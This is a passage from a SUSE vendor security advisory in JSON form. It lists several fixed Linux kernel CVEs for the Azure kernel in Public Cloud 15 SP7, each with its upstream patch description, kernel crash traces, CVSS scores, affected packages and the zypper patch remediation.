"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68797",
"url": "https://www.suse.com/security/cve/CVE-2025-68797"
},
{
"category": "external",
"summary": "SUSE Bug 1256660 for CVE-2025-68797",
"url": "https://bugzilla.suse.com/1256660"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68797"
},
{
"cve": "CVE-2025-68798",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68798"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/amd: Check event before enable to avoid GPF\n\nOn AMD machines cpuc-\u003eevents[idx] can become NULL in a subtle race\ncondition with NMI-\u003ethrottle-\u003ex86_pmu_stop().\n\nCheck event for NULL in amd_pmu_enable_all() before enable to avoid a GPF.\nThis appears to be an AMD only issue.\n\nSyzkaller reported a GPF in amd_pmu_enable_all.\n\nINFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143\n msecs\nOops: general protection fault, probably for non-canonical address\n 0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7]\nCPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk\nRIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195\n arch/x86/events/core.c:1430)\nRSP: 0018:ffff888118009d60 EFLAGS: 00010012\nRAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\nRDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0\nRBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002\nR13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601\nFS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0\nCall Trace:\n \u003cIRQ\u003e\namd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2))\nx86_pmu_enable (arch/x86/events/core.c:1360)\nevent_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186\n kernel/events/core.c:2346)\n__perf_remove_from_context (kernel/events/core.c:2435)\nevent_function (kernel/events/core.c:259)\nremote_function (kernel/events/core.c:92 (discriminator 1)\n kernel/events/core.c:72 (discriminator 1))\n__flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64\n kernel/smp.c:135 kernel/smp.c:540)\n__sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207\n ./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272)\nsysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47)\n arch/x86/kernel/smp.c:266 (discriminator 47))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68798",
"url": "https://www.suse.com/security/cve/CVE-2025-68798"
},
{
"category": "external",
"summary": "SUSE Bug 1256689 for CVE-2025-68798",
"url": "https://bugzilla.suse.com/1256689"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68798"
},
{
"cve": "CVE-2025-68800",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68800"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats\n\nCited commit added a dedicated mutex (instead of RTNL) to protect the\nmulticast route list, so that it will not change while the driver\nperiodically traverses it in order to update the kernel about multicast\nroute stats that were queried from the device.\n\nOne instance of list entry deletion (during route replace) was missed\nand it can result in a use-after-free [1].\n\nFix by acquiring the mutex before deleting the entry from the list and\nreleasing it afterwards.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\nRead of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043\n\nCPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full)\nHardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017\nWorkqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xba/0x110\n print_report+0x174/0x4f5\n kasan_report+0xdf/0x110\n mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x70\n __kasan_slab_free+0x43/0x70\n kfree+0x14e/0x700\n mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68800",
"url": "https://www.suse.com/security/cve/CVE-2025-68800"
},
{
"category": "external",
"summary": "SUSE Bug 1256646 for CVE-2025-68800",
"url": "https://bugzilla.suse.com/1256646"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68800"
},
{
"cve": "CVE-2025-68801",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68801"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_router: Fix neighbour use-after-free\n\nWe sometimes observe use-after-free when dereferencing a neighbour [1].\nThe problem seems to be that the driver stores a pointer to the\nneighbour, but without holding a reference on it. A reference is only\ntaken when the neighbour is used by a nexthop.\n\nFix by simplifying the reference counting scheme. Always take a\nreference when storing a neighbour pointer in a neighbour entry. Avoid\ntaking a referencing when the neighbour is used by a nexthop as the\nneighbour entry associated with the nexthop already holds a reference.\n\nTested by running the test that uncovered the problem over 300 times.\nWithout this patch the problem was reproduced after a handful of\niterations.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310\nRead of size 8 at addr ffff88817f8e3420 by task ip/3929\n\nCPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full)\nHardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_address_description.constprop.0+0x6e/0x300\n print_report+0xfc/0x1fb\n kasan_report+0xe4/0x110\n mlxsw_sp_neigh_entry_update+0x2d4/0x310\n mlxsw_sp_router_rif_gone_sync+0x35f/0x510\n mlxsw_sp_rif_destroy+0x1ea/0x730\n mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0\n __mlxsw_sp_inetaddr_lag_event+0xcc/0x130\n __mlxsw_sp_inetaddr_event+0xf5/0x3c0\n mlxsw_sp_router_netdevice_event+0x1015/0x1580\n notifier_call_chain+0xcc/0x150\n call_netdevice_notifiers_info+0x7e/0x100\n __netdev_upper_dev_unlink+0x10b/0x210\n netdev_upper_dev_unlink+0x79/0xa0\n vrf_del_slave+0x18/0x50\n do_set_master+0x146/0x7d0\n do_setlink.isra.0+0x9a0/0x2880\n rtnl_newlink+0x637/0xb20\n rtnetlink_rcv_msg+0x6fe/0xb90\n netlink_rcv_skb+0x123/0x380\n netlink_unicast+0x4a3/0x770\n netlink_sendmsg+0x75b/0xc90\n __sock_sendmsg+0xbe/0x160\n ____sys_sendmsg+0x5b2/0x7d0\n ___sys_sendmsg+0xfd/0x180\n __sys_sendmsg+0x124/0x1c0\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n[...]\n\nAllocated by task 109:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7b/0x90\n __kmalloc_noprof+0x2c1/0x790\n neigh_alloc+0x6af/0x8f0\n ___neigh_create+0x63/0xe90\n mlxsw_sp_nexthop_neigh_init+0x430/0x7e0\n mlxsw_sp_nexthop_type_init+0x212/0x960\n mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280\n mlxsw_sp_nexthop6_group_get+0x392/0x6a0\n mlxsw_sp_fib6_entry_create+0x46a/0xfd0\n mlxsw_sp_router_fib6_replace+0x1ed/0x5f0\n mlxsw_sp_router_fib6_event_work+0x10a/0x2a0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nFreed by task 154:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x60\n __kasan_slab_free+0x43/0x70\n kmem_cache_free_bulk.part.0+0x1eb/0x5e0\n kvfree_rcu_bulk+0x1f2/0x260\n kfree_rcu_work+0x130/0x1b0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nLast potentially related work creation:\n kasan_save_stack+0x30/0x50\n kasan_record_aux_stack+0x8c/0xa0\n kvfree_call_rcu+0x93/0x5b0\n mlxsw_sp_router_neigh_event_work+0x67d/0x860\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68801",
"url": "https://www.suse.com/security/cve/CVE-2025-68801"
},
{
"category": "external",
"summary": "SUSE Bug 1256653 for CVE-2025-68801",
"url": "https://bugzilla.suse.com/1256653"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68801"
},
{
"cve": "CVE-2025-68802",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68802"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe: Limit num_syncs to prevent oversized allocations\n\nThe exec and vm_bind ioctl allow userspace to specify an arbitrary\nnum_syncs value. Without bounds checking, a very large num_syncs\ncan force an excessively large allocation, leading to kernel warnings\nfrom the page allocator as below.\n\nIntroduce DRM_XE_MAX_SYNCS (set to 1024) and reject any request\nexceeding this limit.\n\n\"\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 1217 at mm/page_alloc.c:5124 __alloc_frozen_pages_noprof+0x2f8/0x2180 mm/page_alloc.c:5124\n...\nCall Trace:\n \u003cTASK\u003e\n alloc_pages_mpol+0xe4/0x330 mm/mempolicy.c:2416\n ___kmalloc_large_node+0xd8/0x110 mm/slub.c:4317\n __kmalloc_large_node_noprof+0x18/0xe0 mm/slub.c:4348\n __do_kmalloc_node mm/slub.c:4364 [inline]\n __kmalloc_noprof+0x3d4/0x4b0 mm/slub.c:4388\n kmalloc_noprof include/linux/slab.h:909 [inline]\n kmalloc_array_noprof include/linux/slab.h:948 [inline]\n xe_exec_ioctl+0xa47/0x1e70 drivers/gpu/drm/xe/xe_exec.c:158\n drm_ioctl_kernel+0x1f1/0x3e0 drivers/gpu/drm/drm_ioctl.c:797\n drm_ioctl+0x5e7/0xc50 drivers/gpu/drm/drm_ioctl.c:894\n xe_drm_ioctl+0x10b/0x170 drivers/gpu/drm/xe/xe_device.c:224\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:598 [inline]\n __se_sys_ioctl fs/ioctl.c:584 [inline]\n __x64_sys_ioctl+0x18b/0x210 fs/ioctl.c:584\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xbb/0x380 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n...\n\"\n\nv2: Add \"Reported-by\" and Cc stable kernels.\nv3: Change XE_MAX_SYNCS from 64 to 1024. (Matt \u0026 Ashutosh)\nv4: s/XE_MAX_SYNCS/DRM_XE_MAX_SYNCS/ (Matt)\nv5: Do the check at the top of the exec func. (Matt)\n\n(cherry picked from commit b07bac9bd708ec468cd1b8a5fe70ae2ac9b0a11c)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68802",
"url": "https://www.suse.com/security/cve/CVE-2025-68802"
},
{
"category": "external",
"summary": "SUSE Bug 1256661 for CVE-2025-68802",
"url": "https://bugzilla.suse.com/1256661"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
